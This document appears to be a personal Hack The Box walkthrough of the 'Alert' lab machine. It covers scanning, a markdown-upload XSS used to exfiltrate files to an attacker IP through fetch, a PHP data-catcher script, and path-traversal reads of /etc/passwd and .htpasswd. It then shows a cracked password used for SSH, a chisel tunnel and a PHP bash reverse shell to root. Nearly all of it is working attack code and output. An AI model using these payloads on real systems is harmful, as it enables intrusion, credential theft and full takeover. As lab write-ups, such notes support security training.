nmap

nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-10 11:32 EST
Nmap scan report for 10.10.11.44
Host is up (0.022s latency).
Not shown: 65532 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/10%OT=22%CT=1%CU=32545%PV=Y%DS=2%DC=T%G=Y%TM=6781
OS:4BD7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
 
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   19.94 ms 10.10.14.1
2   20.08 ms 10.10.11.44
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.91 seconds

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

vhosts

ffuf -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://alert.htb -H 'Host: FUZZ.alert.htb' -fc 301
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://alert.htb
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.alert.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________
 
statistics              [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 19ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1886 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

markdown

uploading this markdown > view markdown
this will trigger the xss

test.md

# Testing MD
 
<script>alert('XSS');</script>

index.php

php

<?php
if (isset($_GET['data'])) {
    // Split the received data if it contains multiple segments
    $dataList = explode(";", $_GET['data']);
    
    foreach ($dataList as $key => $value) {
        $data = urldecode($value);
        // Open or create a file to log the data
        $file = fopen("data.txt", "a+");
        // Log the victim's IP address and the received data
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Data: {$data}\n");
        fclose($file);
    }
}
?>

sudo php -S 0.0.0.0:80

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://alert.htb/FUZZ.php -mc 200
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://alert.htb/FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________
 
contact                 [Status: 200, Size: 24, Words: 3, Lines: 2, Duration: 22ms]
messages                [Status: 200, Size: 1, Words: 1, Lines: 2, Duration: 22ms]

couldn't discover which parameter it was but the solution shows it is file

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://alert.htb/messages.php?FUZZ=key

index.php

php

<?php
if (isset($_GET['data'])) {
    // Split the received data if it contains multiple segments
    $dataList = explode(";", $_GET['data']);
    
    foreach ($dataList as $key => $value) {
        $data = urldecode($value);
        // Open or create a file to log the data
        $file = fopen("data.txt", "a+");
        // Log the victim's IP address and the received data
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Data: {$data}\n");
        fclose($file);
    }
}
?>

test.md

# Testing MD
 
<script>
  fetch('http://alert.htb/messages.php?file=../../../../../../../etc/passwd')
    .then(res => res.text())
    .then(data => fetch('http://10.10.14.6?data=' + encodeURIComponent(data)))
    .catch(err => console.error(err));
</script>

sudo php -S 0.0.0.0:80

upload the test.md > to trigger copy the shared link > send in contact page to trigger the vulnerability

will get a hit if the directory exists

[Fri Jan 10 16:48:47 2025] 10.10.11.44:51876 [200]: GET /?data=%3Cpre%3Eroot%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash%0Adaemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fusr%2Fsbin%2Fnologin%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Asys%3Ax%3A3%3A3%3Asys%3A%2Fdev%3A%2Fusr%2Fsbin%2Fnologin%0Async%3Ax%3A4%3A65534%3Async%3A%2Fbin%3A%2Fbin%2Fsync%0Agames%3Ax%3A5%3A60%3Agames%3A%2Fusr%2Fgames%3A%2Fusr%2Fsbin%2Fnologin%0Aman%3Ax%3A6%3A12%3Aman%3A%2Fvar%2Fcache%2Fman%3A%2Fusr%2Fsbin%2Fnologin%0Alp%3Ax%3A7%3A7%3Alp%3A%2Fvar%2Fspool%2Flpd%3A%2Fusr%2Fsbin%2Fnologin%0Amail%3Ax%3A8%3A8%3Amail%3A%2Fvar%2Fmail%3A%2Fusr%2Fsbin%2Fnologin%0Anews%3Ax%3A9%3A9%3Anews%3A%2Fvar%2Fspool%2Fnews%3A%2Fusr%2Fsbin%2Fnologin%0Auucp%3Ax%3A10%3A10%3Auucp%3A%2Fvar%2Fspool%2Fuucp%3A%2Fusr%2Fsbin%2Fnologin%0Aproxy%3Ax%3A13%3A13%3Aproxy%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Awww-data%3Ax%3A33%3A33%3Awww-data%3A%2Fvar%2Fwww%3A%2Fusr%2Fsbin%2Fnologin%0Abackup%3Ax%3A34%3A34%3Abackup%3A%2Fvar%2Fbackups%3A%2Fusr%2Fsbin%2Fnologin%0Alist%3Ax%3A38%3A38%3AMailing%20List%20Manager%3A%2Fvar%2Flist%3A%2Fusr%2Fsbin%2Fnologin%0Airc%3Ax%3A39%3A39%3Aircd%3A%2Fvar%2Frun%2Fircd%3A%2Fusr%2Fsbin%2Fnologin%0Agnats%3Ax%3A41%3A41%3AGnats%20Bug-Reporting%20System%20(admin)%3A%2Fvar%2Flib%2Fgnats%3A%2Fusr%2Fsbin%2Fnologin%0Anobody%3Ax%3A65534%3A65534%3Anobody%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-network%3Ax%3A100%3A102%3Asystemd%20Network%20Management%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-resolve%3Ax%3A101%3A103%3Asystemd%20Resolver%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-timesync%3Ax%3A102%3A104%3Asystemd%20Time%20Synchronization%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Amessagebus%3Ax%3A103%3A106%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asyslog%3Ax%3A104%3A110%3A%3A%2Fhome%2Fsyslog%3A%2Fusr%2Fsbin%2Fnologin%0A_apt%3Ax%3A105%3A65534%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Atss%3Ax%3A106%3A111%3ATPM%20software%20stack%2C%2C%2C%3A%2Fvar%2Flib%2Ftpm%3A%2Fbin%2Ffalse%0Auuidd%3Ax%3A107%3A112%3A%3A%2Frun%2Fuuidd%3A%2Fusr%2Fsbin%2Fnologin%0Atcpdump%3Ax%3A108%3A113%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Alandscape%3Ax%3A109%3A115%3A%3A%2Fvar%2Flib%2Flandscape%3A%2Fusr%2Fsbin%2Fnologin%0Apollinate%3Ax%3A110%3A1%3A%3A%2Fvar%2Fcache%2Fpollinate%3A%2Fbin%2Ffalse%0Afwupd-refresh%3Ax%3A111%3A116%3Afwupd-refresh%20user%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Ausbmux%3Ax%3A112%3A46%3Ausbmux%20daemon%2C%2C%2C%3A%2Fvar%2Flib%2Fusbmux%3A%2Fusr%2Fsbin%2Fnologin%0Asshd%3Ax%3A113%3A65534%3A%3A%2Frun%2Fsshd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-coredump%3Ax%3A999%3A999%3Asystemd%20Core%20Dumper%3A%2F%3A%2Fusr%2Fsbin%2Fnologin%0Aalbert%3Ax%3A1000%3A1000%3Aalbert%3A%2Fhome%2Falbert%3A%2Fbin%2Fbash%0Alxd%3Ax%3A998%3A100%3A%3A%2Fvar%2Fsnap%2Flxd%2Fcommon%2Flxd%3A%2Fbin%2Ffalse%0Adavid%3Ax%3A1001%3A1002%3A%2C%2C%2C%3A%2Fhome%2Fdavid%3A%2Fbin%2Fbash%0A%3C%2Fpre%3E%0A

Victim IP: 10.10.11.44 | Data: <pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
</pre>

users

txt

albert
david

searching LFI for apache config files

ref: https://www.simplified.guide/apache/configuration-files

test.md

# Testing MD
 
<script>
  fetch('http://alert.htb/messages.php?file=../../../../../../../etc/apache2/apache2.conf')
    .then(res => res.text())
    .then(data => fetch('http://10.10.14.6?data=' + encodeURIComponent(data)))
    .catch(err => console.error(err));
</script>

[Fri Jan 10 19:51:28 2025] 10.10.11.44:35626 [200]: GET /?data=%3Cpre%3E%23%20This%20is%20the%20main%20Apache%20server%20configuration%20file.%20%20It%20contains%20the%0A%23%20configuration%20directives%20that%20give%20the%20server%20its%20instructions.%0A%23%20See%20http%3A%2F%2Fhttpd.apache.org%2Fdocs%2F2.4%2F%20for%20detailed%20information%20about%0A%23%20the%20directives%20and%20%2Fusr%2Fshare%2Fdoc%2Fapache2%2FREADME.Debian%20about%20Debian%20specific%0A%23%20hints.%0A%23%0A%23%0A%23%20Summary%20of%20how%20the%20Apache%202%20configuration%20works%20in%20Debian%3A%0A%23%20The%20Apache%202%20web%20server%20configuration%20in%20Debian%20is%20quite%20different%20to%0A%23%20upstream%27s%20suggested%20way%20to%20configure%20the%20web%20server.%20This%20is%20because%20Debian%27s%0A%23%20default%20Apache2%20installation%20attempts%20to%20make%20adding%20and%20removing%20modules%2C%0A%23%20virtual%20hosts%2C%20and%20extra%20configuration%20directives%20as%20flexible%20as%20possible%2C%20in%0A%23%20order%20to%20make%20automating%20the%20changes%2...
...

 
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives.  See also the AllowOverride
# directive.
#
AccessFileName .htaccess

common files to check for apache

txt

/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf

Victim IP: 10.10.11.44 | Data: <pre><VirtualHost *:80>
    ServerName alert.htb
 
    DocumentRoot /var/www/alert.htb
 
    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>
 
    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]
 
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
 
<VirtualHost *:80>
    ServerName statistics.alert.htb
 
    DocumentRoot /var/www/statistics.alert.htb
 
    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>
 
    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>
 
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
 
</pre>

click on Share Markdown to get the link of th efile

test.md

# Testing MD
 
<script>
  fetch('http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd')
    .then(res => res.text())
    .then(data => fetch('http://10.10.14.6?data=' + encodeURIComponent(data)))
    .catch(err => console.error(err));
</script>

[Fri Jan 10 20:17:10 2025] 10.10.11.44:37864 [200]: GET /?data=%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A

Victim IP: 10.10.11.44 | Data: <pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>

hashcat

hashcat -m 1600 '$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/' /usr/share/wordlists/rockyou.txt
 
$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/:manchesterunited

creds

albert:manchesterunited

ssh

ssh albert@10.10.11.44
password: manchesterunited

user.txt

albert@alert:~$ cat user.txt
d69b3845...

priv esc

albert@alert:~$ uname -a
Linux alert 5.4.0-200-generic #220-Ubuntu SMP Fri Sep 27 13:19:16 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

albert@alert:/$ netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -

[*] fst150 Looking for GIT/SVN repositories................................ yes!
---
/opt/website-monitor/.git

================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
tcp    LISTEN  0       4096         127.0.0.1:8080        0.0.0.0:*

╔══════════╣ Files inside others home (limit 20)
/var/www/alert.htb/messages.php
/var/www/alert.htb/messages/2024-03-10_15-48-34.txt
/var/www/alert.htb/Parsedown.php
/var/www/alert.htb/contact.php
/var/www/alert.htb/visualizer.php
/var/www/alert.htb/css/style.css
/var/www/alert.htb/index.php

 
╔══════════╣ Web files?(output limit)
/var/www/:
total 20K
drwxr-xr-x  5 root     root     4.0K Nov 14 11:06 .
drwxr-xr-x 13 root     root     4.0K Oct 12 02:53 ..
drwxrwxrwx  5 www-data www-data 4.0K Oct 12 01:42 alert.htb
drwxr-xr-x  2 root     root     4.0K Jul 17 18:58 html
drwxrwx---  3 www-data www-data 4.0K Apr 11  2024 statistics.alert.htb

internal port 8080

./chisel server --reverse --port 1234

./chisel client own-ip:1234 R:8000:127.0.0.1:8080

https://github.com/neatnik/website-monitor
the software github page can be found on the footer of the page

/var/backups

albert@alert:/var/backups$ ls -al
total 100
drwxr-xr-x  2 root root  4096 Jan 10 22:02 .
drwxr-xr-x 13 root root  4096 Oct 12 02:53 ..
-rw-r--r--  1 root root 47392 Nov 19 14:21 apt.extended_states.0
-rw-r--r--  1 root root  5191 Nov 11 11:28 apt.extended_states.1.gz
-rw-r--r--  1 root root  5180 Nov  5 11:54 apt.extended_states.2.gz
-rw-r--r--  1 root root  5374 Mar  9  2024 apt.extended_states.3.gz
-rw-r--r--  1 root root 18913 Mar 10  2024 backup.zip

albert@alert:/var/backups$ python3 -m http.server 8000

wget http://10.10.11.44:8000/backup.zip

unzip backup.zip
Archive:  backup.zip
   creating: var/www/alert.htb/
[backup.zip] var/www/alert.htb/messages.php password:

zip2john backup.zip > backup.hash

root process

root is running php at /opt/website-monitor so if we found a folder that can write and inject reverse php we are immediately root

ps aux | grep root
 
root        1021  0.0  0.6 281068 26820 ?        Ss   Jan10   0:05 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor

rev.php

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'"); ?>

to trigger exploit viist http://127.0.0.1:8000/config/rev.php

nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.44] 48868
bash: cannot set terminal process group (1021): Inappropriate ioctl for device
bash: no job control in this shell
root@alert:/opt/website-monitor/config# whoami
whoami
root

root.txt

root@alert:~# cat root.txt
cat root.txt
1b78a1a9...

HTB — Alert

nmap

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

directory

vhosts

markdown

Blind XSS leading to LFI

users

searching LFI for apache config files

hashcat

creds

ssh

user.txt

priv esc

internal port 8080

/var/backups

root process

root.txt